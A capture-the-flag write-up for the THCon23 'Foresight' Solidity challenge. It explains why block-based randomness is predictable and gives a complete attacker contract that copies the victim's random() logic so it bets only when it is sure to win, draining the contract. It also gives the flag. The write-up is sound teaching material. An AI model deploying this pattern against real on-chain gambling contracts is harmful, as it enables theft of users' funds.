# Foresight THCon23 writup

Hello there ! Today we will discuss the "foresight" solidity challenge that KirrimK created for the THCon. 


![](./0.png)

### The vulnerability

This challenge talks about "bad random" in solidity. It's pretty impossible to have a random function in solidity if you rely on only 1 transaction on the same block, simply because you can simulate it before running it. Good behaviour is to rely on future impredictible things like the n+10 hash for example.

## The code

```js

pragma solidity ^0.8.0;

contract Foresight {

    bool public isLocked;
    uint256 public nonce;
    uint constant card = 4;
    uint constant odds = 1;
    uint256 constant winAmount = 0.1 ether;
    mapping (address => uint256) private lastBlockPlayed;
    uint256 public seed;

    constructor() payable{
        require(msg.value == 0.5 ether);
        isLocked = true;
        nonce = block.timestamp;
        seed = uint256(keccak256(abi.encodePacked(block.coinbase, nonce, address(this), uint32(0xbeefbeef))));
    }

    function unlock() public {
        require(address(this).balance == 0);
        isLocked = false;
    }

    function random() internal returns (bool){
        bool _result;
        assembly {
                // something really disgusting
        }
        return _result;
    }

    function bet() public payable returns (bool) {
        require(msg.value == 0.05 ether, "A payment of 0.05 ether is required to play");
        require(lastBlockPlayed[address(msg.sender)] != block.number, "You already played during this block");
        lastBlockPlayed[address(msg.sender)] = block.number;
        if (random()) {
            uint256 amountToSend = 0;
            if (address(this).balance <= 0.1 ether){
                amountToSend = address(this).balance + msg.value;
            }
            else {
                amountToSend = winAmount + msg.value;
            }
            (bool sent, ) = msg.sender.call{value: amountToSend}("");
            require(sent, "Failed to send Ether");
            return true;
        }
        else {
            return false;
        }
    }
}
```

## Solution path

The key to this challenge is to SIMPLIFY and abstract the problem. The programmer really wanted us not to understand this dirty assembly code. We see "cards" and "odds" variables. Maybe the random function uses this to make us win with a probability of 0.25. But as we bet 0.05 to win 0.1 the expected value is < 1 so we will not empty this smart contract just by playing it a lot of time...

The overall objective is to :
1. Deploy an attacker smart contract
2. Check the `random()` function of the victim smart contract, and `bet()` only if we know that the result of `random()` will make us win. 

As we will have a 1/4 chance to win each block, we can expect the attack duration of **20 blocs (4 minutes).** If you play enougth with the smart contract, you will notice that each call of `random()` function increase the counter of "nonce" to one.

But we have a problem : `random()` function is *internal*. Then, we will simply copy it into our attacker smart contract. The seed and the nonce is also public. So we can "import" them into our smart contract.


```js
pragma solidity ^0.8.0;

interface badrandom {
    function bet() external payable returns (bool);
}

contract solveBadRandom {

    bool public isLocked;
    uint256 public nonce;
    uint constant card = 4;
    uint constant odds = 1;
    uint256 constant winAmount = 0.1 ether;
    mapping (address => uint256) private lastBlockPlayed;
    uint256 public seed;

    address owner;
    badrandom attack;
    uint public wincount = 0;
    uint public myval;
    uint public myodds;

    constructor(address _badrandom) payable {
        require(msg.value == 0.1 ether);
        owner = msg.sender;
        attack = badrandom(_badrandom);
    }

    function setNonce(uint256 _nonce) public { nonce = _nonce; }

    function setSeed(uint256 _seed) public {   seed = _seed;   }
    
    function setBadRandom(address _badrandom) public { attack = badrandom(_badrandom); }

    function random() internal returns (bool) {
        // COPY THE FUNCTION FROM SOURCE CODE
    }
    
    function solve() public {

        if(random()){
            attack.bet{value: 0.05 ether}();
            wincount++;
        }
        else {
            nonce--;
        }

    }

   // bonus : get free ether without using the faucet for other challenges 😎
    function withdraw() public {
        (bool sent, ) = owner.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }

    function getBalance() public view returns(uint){  return address(this).balance; }

    fallback() external payable {  /*a fallback function to receive funds */  }

}
```

The main function is :

```js
    function solve() public {

        if(random()){
            attack.bet{value: 0.05 ether}();
            wincount++;
        }
        else {
            nonce--;
        }

    }
```

I only bet if i know i will win. Because of the side effect of `random()`, i decrease the nonce counter if i know i will not win because i will not call the victim smart contract.

Notice that even if it's useless for my attacker smart contract, i keep the memory variable the same as the victim smart contract because i "don't know" how the memory is handled in the `random()` function.

Now you can call the `solve()` function at each block and wait for the win. **But you will notice that it won't work.**. It's because some things in the `random()` function is linked to the point of view of the Foresight smart contract. 

For example, maybe the random function uses the `caller()` function that returns the address of the person who called the current smart contract.

1. When i call `solve()` on my attacker smart contract, `caller()` will be me.
2. When the smart contract will call `bet()`, `caller()` will be instead the attacker smart contract.

So we need to fix things on the dirty yul code that is linked to the point of view of Foresight smart contract.

We can search in the code for things that change when you have a different point of view like that. For example, `caller()`, but also `address()` which return the current smart contract address !

![](./1.png)

![](./2.png)


So, in **our** smart contract, we need to replace `caller()` in the random function for what *will be* `caller()` in the victim smart contract, so our own attacker smart contract address. And we need to replace `address()` in the random function for what *is* it in the victim smart contract, so the victim address.

![](./3.png)

And now our attacker `random()` function is the same as the victim `random()` function. 


We can empty the smart contract and get the flag : `THCon23{S3ize_0uR_De5t1ny_26fc15df6}`

## Bonus
FYI, this is the simplified equivalent smart contract code that ~~i reversed~~ KirrimK used to create the YUL code:

```js
    function random() internal returns (bool) {
        uint256[4] memory v;
        v[0] = uint256(keccak256(abi.encode(block.timestamp, msg.sender, nonce)));
        v[1] = uint256(keccak256(abi.encodePacked(v[0], blockhash(block.number - 1))));
        v[2] = uint256(keccak256(abi.encodePacked(v[1], address(this), block.gaslimit)));
        v[3] = uint256(keccak256(abi.encodePacked(v[2], block.coinbase, blockhash(block.number - 2))));
        uint256 val = ((v[0] << 96) ^ (v[1] << 64) ^ (v[2] << 32) ^ v[3]) % card;
        nonce++;
        return val < odds;
    }

```


## Full solution

The full solution is below. Enjoy and congrats to **palkeo** who solve this challenge !

```js
pragma solidity ^0.8.0;

interface badrandom {
    function bet() external payable returns (bool);
}

contract solveBadRandom {

    bool public isLocked;
    uint256 public nonce;
    uint constant card = 4;
    uint constant odds = 1;
    uint256 constant winAmount = 0.1 ether;
    mapping (address => uint256) private lastBlockPlayed;
    uint256 public seed;

    address owner;
    badrandom attack;
    uint public wincount = 0;
    uint public myval;
    uint public myodds;

    constructor(address _badrandom) payable {
        require(msg.value == 0.1 ether);
        owner = msg.sender;
        attack = badrandom(_badrandom);
    }

    function setNonce(uint256 _nonce) public {
        nonce = _nonce;
    }

    function setSeed(uint256 _seed) public {
        seed = _seed;
    }
    
    function setBadRandom(address _badrandom) public {
        attack = badrandom(_badrandom);
    }
    function random() internal returns (bool){
        bool _result;
        
        //we add some adresses
        address myaddress = address(this); // remplace :  `caller()` statement
        address attackaddress = address(attack); // remplace: `address()` statement
        assembly {
                function zero_memory_chunk_t_uint256(dataStart, dataSizeInBytes) {
                    calldatacopy(dataStart, calldatasize(), dataSizeInBytes)
                }
                function round_up_to_mul_of_32(value) -> result {
                    result := and(add(value, 31), not(31))
                }
                function finalize_allocation(memPtr, size) {
                    let newFreePtr := add(memPtr, round_up_to_mul_of_32(size))
                    // protect against overflow
                    if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() }
                    mstore(64, newFreePtr)
                }
                function allocate_unbounded() -> memPtr {
                    memPtr := mload(64)
                }
                function allocate_memory(size) -> memPtr {
                    memPtr := allocate_unbounded()
                    finalize_allocation(memPtr, size)
                }
                function panic_error_0x41() {
                    mstore(0, 35408467139433450592217433187231851964531694900788300625387963629091585785856)
                    mstore(4, 0x41)
                    revert(0, 0x24)
                }
                function array_allocation_size_t_array$_t_uint256_$4_memory_ptr(length) -> size {
                    if gt(length, 0xffffffffffffffff) { panic_error_0x41() }
                    size := mul(length, 0x20)
                }
                function allocate_memory_array_t_array$_t_uint256_$4_memory_ptr(length) -> memPtr {
                    let allocSize := array_allocation_size_t_array$_t_uint256_$4_memory_ptr(length)
                    memPtr := allocate_memory(allocSize)
                }
                function allocate_and_zero_memory_array_t_array$_t_uint256_$4_memory_ptr(length) -> memPtr {
                    memPtr := allocate_memory_array_t_array$_t_uint256_$4_memory_ptr(length)
                    let dataStart := memPtr
                    let dataSize := array_allocation_size_t_array$_t_uint256_$4_memory_ptr(length)
                    zero_memory_chunk_t_uint256(dataStart, dataSize)
                }
                function shift_right_0_unsigned(value) -> newValue {
                    newValue := shr(0, value)
                }
                function cleanup_from_storage_t_uint256(value) -> cleaned {
                    cleaned := value
                }
                function extract_from_storage_value_offset_0t_uint256(slot_value) -> value {
                    value := cleanup_from_storage_t_uint256(shift_right_0_unsigned(slot_value))
                }
                function read_from_storage_split_offset_0_t_uint256(slot) -> value {
                    value := extract_from_storage_value_offset_0t_uint256(sload(slot))
                }
                function cleanup_t_address(value) -> cleaned {
                    cleaned := cleanup_t_uint160(value)
                }
                function cleanup_t_uint256(value) -> cleaned {
                    cleaned := value
                }
                function cleanup_t_uint160(value) -> cleaned {
                    cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff)
                }
                function abi_encode_t_uint256_to_t_uint256_fromStack(value, pos) {
                    mstore(pos, cleanup_t_uint256(value))
                }
                function abi_encode_t_address_to_t_address_fromStack(value, pos) {
                    mstore(pos, cleanup_t_address(value))
                }
                function abi_encode_tuple_t_uint256_t_address_t_uint256__to_t_uint256_t_address_t_uint256__fromStack(headStart , value0, value1, value2) -> tail {
                    tail := add(headStart, 96)
                    abi_encode_t_uint256_to_t_uint256_fromStack(value0,  add(headStart, 0))
                    abi_encode_t_address_to_t_address_fromStack(value1,  add(headStart, 32))
                    abi_encode_t_uint256_to_t_uint256_fromStack(value2,  add(headStart, 64))
                }
                function array_dataslot_t_bytes_memory_ptr(ptr) -> data {
                    data := ptr
                    data := add(ptr, 0x20)
                }
                function array_length_t_bytes_memory_ptr(value) -> length {
                    length := mload(value)
                }
                function convert_t_bytes32_to_t_uint256(value) -> converted {
                    converted := convert_t_uint256_to_t_uint256(shift_right_0_unsigned(value))
                }
                function convert_t_uint256_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_uint256(value)))
                }
                function identity(value) -> ret {
                    ret := value
                }
                function write_to_memory_t_uint256(memPtr, value) {
                    mstore(memPtr, cleanup_t_uint256(value))
                }
                function array_length_t_array$_t_uint256_$4_memory_ptr(value) -> length {
                    length := 0x04
                }
                function panic_error_0x32() {
                    mstore(0, 35408467139433450592217433187231851964531694900788300625387963629091585785856)
                    mstore(4, 0x32)
                    revert(0, 0x24)
                }
                function memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(baseRef, index) -> addr {
                    if iszero(lt(index, array_length_t_array$_t_uint256_$4_memory_ptr(baseRef))) {
                        panic_error_0x32()
                    }
                    let offset := mul(index, 32)
                    addr := add(baseRef, offset)
                }
                function convert_t_rational_0_by_1_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_rational_0_by_1(value)))
                }
                function cleanup_t_rational_0_by_1(value) -> cleaned {
                    cleaned := value
                }
                function read_from_memoryt_uint256(ptr) -> returnValue {
                    let value := cleanup_t_uint256(mload(ptr))
                    returnValue := value
                }
                function panic_error_0x11() {
                    mstore(0, 35408467139433450592217433187231851964531694900788300625387963629091585785856)
                    mstore(4, 0x11)
                    revert(0, 0x24)
                }
                function checked_sub_t_uint256(x, y) -> diff {
                    x := cleanup_t_uint256(x)
                    y := cleanup_t_uint256(y)
                    diff := sub(x, y)
                    if gt(diff, x) { panic_error_0x11() }
                }
                function cleanup_t_rational_1_by_1(value) -> cleaned {
                    cleaned := value
                }
                function convert_t_rational_1_by_1_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_rational_1_by_1(value)))
                }
                function leftAlign_t_uint256(value) -> aligned {
                    aligned := value
                }
                function abi_encode_t_uint256_to_t_uint256_nonPadded_inplace_fromStack(value, pos) {
                    mstore(pos, leftAlign_t_uint256(cleanup_t_uint256(value)))
                }
                function leftAlign_t_bytes32(value) -> aligned {
                    aligned := value
                }
                function cleanup_t_bytes32(value) -> cleaned {
                    cleaned := value
                }
                function abi_encode_t_bytes32_to_t_bytes32_nonPadded_inplace_fromStack(value, pos) {
                    mstore(pos, leftAlign_t_bytes32(cleanup_t_bytes32(value)))
                }
                function abi_encode_tuple_packed_t_uint256_t_bytes32__to_t_uint256_t_bytes32__nonPadded_inplace_fromStack(pos , value0, value1) -> end {
                    abi_encode_t_uint256_to_t_uint256_nonPadded_inplace_fromStack(value0,  pos)
                    pos := add(pos, 32)
                    abi_encode_t_bytes32_to_t_bytes32_nonPadded_inplace_fromStack(value1,  pos)
                    pos := add(pos, 32)
                    end := pos
                }
                function convert_t_uint160_to_t_uint160(value) -> converted {
                    converted := cleanup_t_uint160(identity(cleanup_t_uint160(value)))
                }
                function convert_t_uint160_to_t_address(value) -> converted {
                    converted := convert_t_uint160_to_t_uint160(value)
                }
                function convert_t_contract$_Foresight_$312_to_t_address(value) -> converted {
                    converted := convert_t_uint160_to_t_address(value)
                }
                function shift_left_96(value) -> newValue {
                    newValue := shl(96, value)
                }
                function leftAlign_t_uint160(value) -> aligned {
                    aligned := shift_left_96(value)
                }
                function leftAlign_t_address(value) -> aligned {
                    aligned := leftAlign_t_uint160(value)
                }
                function abi_encode_t_address_to_t_address_nonPadded_inplace_fromStack(value, pos) {
                    mstore(pos, leftAlign_t_address(cleanup_t_address(value)))
                }
                function abi_encode_tuple_packed_t_uint256_t_address_t_uint256__to_t_uint256_t_address_t_uint256__nonPadded_inplace_fromStack(pos , value0, value1, value2) -> end {
                    abi_encode_t_uint256_to_t_uint256_nonPadded_inplace_fromStack(value0,  pos)
                    pos := add(pos, 32)
                    abi_encode_t_address_to_t_address_nonPadded_inplace_fromStack(value1,  pos)
                    pos := add(pos, 20)
                    abi_encode_t_uint256_to_t_uint256_nonPadded_inplace_fromStack(value2,  pos)
                    pos := add(pos, 32)
                    end := pos
                }
                function cleanup_t_rational_2_by_1(value) -> cleaned {
                    cleaned := value
                }
                function convert_t_rational_2_by_1_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_rational_2_by_1(value)))
                }
                function cleanup_t_address_payable(value) -> cleaned {
                    cleaned := cleanup_t_uint160(value)
                }
                function leftAlign_t_address_payable(value) -> aligned {
                    aligned := leftAlign_t_uint160(value)
                }
                function abi_encode_t_address_payable_to_t_address_payable_nonPadded_inplace_fromStack(value, pos) {
                    mstore(pos, leftAlign_t_address_payable(cleanup_t_address_payable(value)))
                }
                function abi_encode_tuple_packed_t_uint256_t_address_payable_t_bytes32__to_t_uint256_t_address_payable_t_bytes32__nonPadded_inplace_fromStack(pos , value0, value1, value2) -> end {
                    abi_encode_t_uint256_to_t_uint256_nonPadded_inplace_fromStack(value0,  pos)
                    pos := add(pos, 32)
                    abi_encode_t_address_payable_to_t_address_payable_nonPadded_inplace_fromStack(value1,  pos)
                    pos := add(pos, 20)
                    abi_encode_t_bytes32_to_t_bytes32_nonPadded_inplace_fromStack(value2,  pos)
                    pos := add(pos, 32)
                    end := pos
                }
                function cleanup_t_rational_3_by_1(value) -> cleaned {
                    cleaned := value
                }
                function convert_t_rational_3_by_1_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_rational_3_by_1(value)))
                }
                function cleanup_t_uint8(value) -> cleaned {
                    cleaned := and(value, 0xff)
                }
                function convert_t_rational_96_by_1_to_t_uint8(value) -> converted {
                    converted := cleanup_t_uint8(identity(cleanup_t_rational_96_by_1(value)))
                }
                function cleanup_t_rational_96_by_1(value) -> cleaned {
                    cleaned := value
                }
                function shift_left_dynamic(bits, value) -> newValue {
                    newValue := shl(bits, value)
                }
                function shift_left_t_uint256_t_uint8(value, bits) -> result {
                    bits := cleanup_t_uint8(bits)
                    result := cleanup_t_uint256(shift_left_dynamic(bits, cleanup_t_uint256(value)))
                }
                function cleanup_t_rational_64_by_1(value) -> cleaned {
                    cleaned := value
                }
                function convert_t_rational_64_by_1_to_t_uint8(value) -> converted {
                    converted := cleanup_t_uint8(identity(cleanup_t_rational_64_by_1(value)))
                }
                function convert_t_rational_32_by_1_to_t_uint8(value) -> converted {
                    converted := cleanup_t_uint8(identity(cleanup_t_rational_32_by_1(value)))
                }
                function cleanup_t_rational_32_by_1(value) -> cleaned {
                    cleaned := value
                }
                function cleanup_t_rational_4_by_1(value) -> cleaned {
                    cleaned := value
                }
                function convert_t_rational_4_by_1_to_t_uint256(value) -> converted {
                    converted := cleanup_t_uint256(identity(cleanup_t_rational_4_by_1(value)))
                }
                function constant_card_8() -> ret {
                    let expr_7 := card
                    let _48 := convert_t_rational_4_by_1_to_t_uint256(expr_7)

                    ret := _48
                }
                function panic_error_0x12() {
                    mstore(0, 35408467139433450592217433187231851964531694900788300625387963629091585785856)
                    mstore(4, 0x12)
                    revert(0, 0x24)
                }
                function mod_t_uint256(x, y) -> r {
                    x := cleanup_t_uint256(x)
                    y := cleanup_t_uint256(y)
                    if iszero(y) { panic_error_0x12() }
                    r := mod(x, y)
                }
                function increment_t_uint256(value) -> ret {
                    value := cleanup_t_uint256(value)
                    if eq(value, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff) { panic_error_0x11() }
                    ret := add(value, 1)
                }
                function shift_left_0(value) -> newValue {
                    newValue := shl(0, value)
                }
                function update_byte_slice_32_shift_0(value, toInsert) -> result {
                    let mask := 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
                    toInsert := shift_left_0(toInsert)
                    value := and(value, not(mask))
                    result := or(value, and(toInsert, mask))
                }
                function prepare_store_t_uint256(value) -> ret {
                    ret := value
                }
                function update_storage_value_offset_0t_uint256_to_t_uint256(slot, value_0) {
                    let convertedValue_0 := convert_t_uint256_to_t_uint256(value_0)
                    sstore(slot, update_byte_slice_32_shift_0(sload(slot), prepare_store_t_uint256(convertedValue_0)))
                }
                function constant_odds_11() -> ret {
                    let expr_10 := 0x01
                    let _52 := convert_t_rational_1_by_1_to_t_uint256(expr_10)
                    ret := _52
                }
                let zero_t_bool_12 := 0
                _result := zero_t_bool_12
                let expr_87 := 0x04
                let var_v_90_mpos
                let zero_t_array$_t_uint256_$4_memory_ptr_13_mpos := allocate_and_zero_memory_array_t_array$_t_uint256_$4_memory_ptr(4)
                var_v_90_mpos := zero_t_array$_t_uint256_$4_memory_ptr_13_mpos
                let expr_101 := timestamp()
                let expr_103 := myaddress
                let _14 := read_from_storage_split_offset_0_t_uint256(0x01)
                let expr_104 := _14
                let expr_105_mpos := allocate_unbounded()
                let _15 := add(expr_105_mpos, 0x20)
                let _16 := abi_encode_tuple_t_uint256_t_address_t_uint256__to_t_uint256_t_address_t_uint256__fromStack(_15, expr_101, expr_103, expr_104)
                mstore(expr_105_mpos, sub(_16, add(expr_105_mpos, 0x20)))
                finalize_allocation(expr_105_mpos, sub(_16, expr_105_mpos))
                let expr_106 := keccak256(array_dataslot_t_bytes_memory_ptr(expr_105_mpos), array_length_t_bytes_memory_ptr(expr_105_mpos))
                let expr_107 := convert_t_bytes32_to_t_uint256(expr_106)
                let _17_mpos := var_v_90_mpos
                let expr_92_mpos := _17_mpos
                let expr_93 := 0x00
                let _18 := expr_107
                write_to_memory_t_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_92_mpos, convert_t_rational_0_by_1_to_t_uint256(expr_93)), _18)
                let expr_108 := expr_107
                let _19_mpos := var_v_90_mpos
                let expr_118_mpos := _19_mpos
                let expr_119 := 0x00
                let _20 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_118_mpos, convert_t_rational_0_by_1_to_t_uint256(expr_119)))
                let expr_120 := _20
                let expr_123 := number()
                let expr_124 := 0x01
                let expr_125 := checked_sub_t_uint256(expr_123, convert_t_rational_1_by_1_to_t_uint256(expr_124))
                let expr_126 := blockhash(expr_125)
                let expr_127_mpos := allocate_unbounded()
                let _21 := add(expr_127_mpos, 0x20)
                let _22 := abi_encode_tuple_packed_t_uint256_t_bytes32__to_t_uint256_t_bytes32__nonPadded_inplace_fromStack(_21, expr_120, expr_126)
                mstore(expr_127_mpos, sub(_22, add(expr_127_mpos, 0x20)))
                finalize_allocation(expr_127_mpos, sub(_22, expr_127_mpos))
                let expr_128 := keccak256(array_dataslot_t_bytes_memory_ptr(expr_127_mpos), array_length_t_bytes_memory_ptr(expr_127_mpos))
                let expr_129 := convert_t_bytes32_to_t_uint256(expr_128)
                let _23_mpos := var_v_90_mpos
                let expr_110_mpos := _23_mpos
                let expr_111 := 0x01
                let _24 := expr_129
                write_to_memory_t_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_110_mpos, convert_t_rational_1_by_1_to_t_uint256(expr_111)), _24)
                let expr_130 := expr_129
                let _25_mpos := var_v_90_mpos
                let expr_140_mpos := _25_mpos
                let expr_141 := 0x01
                let _26 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_140_mpos, convert_t_rational_1_by_1_to_t_uint256(expr_141)))
                let expr_142 := _26
                let expr_145_address := attackaddress
                let expr_146 := convert_t_contract$_Foresight_$312_to_t_address(expr_145_address)
                let expr_148 := gaslimit()
                let expr_149_mpos := allocate_unbounded()
                let _27 := add(expr_149_mpos, 0x20)
                let _28 := abi_encode_tuple_packed_t_uint256_t_address_t_uint256__to_t_uint256_t_address_t_uint256__nonPadded_inplace_fromStack(_27, expr_142, expr_146, expr_148)
                mstore(expr_149_mpos, sub(_28, add(expr_149_mpos, 0x20)))
                finalize_allocation(expr_149_mpos, sub(_28, expr_149_mpos))
                let expr_150 := keccak256(array_dataslot_t_bytes_memory_ptr(expr_149_mpos), array_length_t_bytes_memory_ptr(expr_149_mpos))
                let expr_151 := convert_t_bytes32_to_t_uint256(expr_150)
                let _29_mpos := var_v_90_mpos
                let expr_132_mpos := _29_mpos
                let expr_133 := 0x02
                let _30 := expr_151
                write_to_memory_t_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_132_mpos, convert_t_rational_2_by_1_to_t_uint256(expr_133)), _30)
                let expr_152 := expr_151
                let _31_mpos := var_v_90_mpos
                let expr_162_mpos := _31_mpos
                let expr_163 := 0x02
                let _32 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_162_mpos, convert_t_rational_2_by_1_to_t_uint256(expr_163)))
                let expr_164 := _32
                let expr_166 := coinbase()
                let expr_169 := number()
                let expr_170 := 0x02
                let expr_171 := checked_sub_t_uint256(expr_169, convert_t_rational_2_by_1_to_t_uint256(expr_170))
                let expr_172 := blockhash(expr_171)
                let expr_173_mpos := allocate_unbounded()
                let _33 := add(expr_173_mpos, 0x20)
                let _34 := abi_encode_tuple_packed_t_uint256_t_address_payable_t_bytes32__to_t_uint256_t_address_payable_t_bytes32__nonPadded_inplace_fromStack(_33, expr_164, expr_166, expr_172)
                mstore(expr_173_mpos, sub(_34, add(expr_173_mpos, 0x20)))
                finalize_allocation(expr_173_mpos, sub(_34, expr_173_mpos))
                let expr_174 := keccak256(array_dataslot_t_bytes_memory_ptr(expr_173_mpos), array_length_t_bytes_memory_ptr(expr_173_mpos))
                let expr_175 := convert_t_bytes32_to_t_uint256(expr_174)
                let _35_mpos := var_v_90_mpos
                let expr_154_mpos := _35_mpos
                let expr_155 := 0x03
                let _36 := expr_175
                write_to_memory_t_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_154_mpos, convert_t_rational_3_by_1_to_t_uint256(expr_155)), _36)
                let expr_176 := expr_175
                let _37_mpos := var_v_90_mpos
                let expr_180_mpos := _37_mpos
                let expr_181 := 0x00
                let _38 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_180_mpos, convert_t_rational_0_by_1_to_t_uint256(expr_181)))
                let expr_182 := _38
                let expr_183 := 0x60
                let _39 := convert_t_rational_96_by_1_to_t_uint8(expr_183)
                let expr_184 := shift_left_t_uint256_t_uint8(expr_182, _39)
                let expr_185 := expr_184
                let _40_mpos := var_v_90_mpos
                let expr_186_mpos := _40_mpos
                let expr_187 := 0x01
                let _41 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_186_mpos, convert_t_rational_1_by_1_to_t_uint256(expr_187)))
                let expr_188 := _41
                let expr_189 := 0x40
                let _42 := convert_t_rational_64_by_1_to_t_uint8(expr_189)
                let expr_190 :=
                shift_left_t_uint256_t_uint8(expr_188, _42)
                let expr_191 := expr_190
                let expr_192 := xor(expr_185, expr_191)
                let _43_mpos := var_v_90_mpos
                let expr_193_mpos := _43_mpos
                let expr_194 := 0x02
                let _44 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_193_mpos, convert_t_rational_2_by_1_to_t_uint256(expr_194)))
                let expr_195 := _44
                let expr_196 := 0x20
                let _45 := convert_t_rational_32_by_1_to_t_uint8(expr_196)
                let expr_197 :=
                shift_left_t_uint256_t_uint8(expr_195, _45)
                let expr_198 := expr_197
                let expr_199 := xor(expr_192, expr_198)
                let _46_mpos := var_v_90_mpos
                let expr_200_mpos := _46_mpos
                let expr_201 := 0x03
                let _47 := read_from_memoryt_uint256(memory_array_index_access_t_array$_t_uint256_$4_memory_ptr(expr_200_mpos, convert_t_rational_3_by_1_to_t_uint256(expr_201)))
                let expr_202 := _47
                let expr_203 := xor(expr_199, expr_202)
                let expr_204 := expr_203
                let expr_205 := constant_card_8()
                let expr_206 := mod_t_uint256(expr_204, expr_205)
                let var_val_179 := expr_206
                let _50 := read_from_storage_split_offset_0_t_uint256(0x01)
                let _49 := increment_t_uint256(_50)
                update_storage_value_offset_0t_uint256_to_t_uint256(0x01, _49)
                let expr_209 := _50
                let _51 := var_val_179
                let expr_211 := _51
                let expr_212 := constant_odds_11()
                let expr_213 := lt(cleanup_t_uint256(expr_211), cleanup_t_uint256(expr_212))
                _result := expr_213
        }
        return _result;
    }
    
    function solve() public {

        if(random()){
            attack.bet{value: 0.05 ether}();
            wincount++;
        }
        else {
            nonce--;
        }

    }

    function withdraw() public {
        (bool sent, ) = owner.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }

    function getBalance() public view returns(uint){
        return address(this).balance;
    }

    fallback() external payable {
        //a fallback function to receive funds
    }

}
```
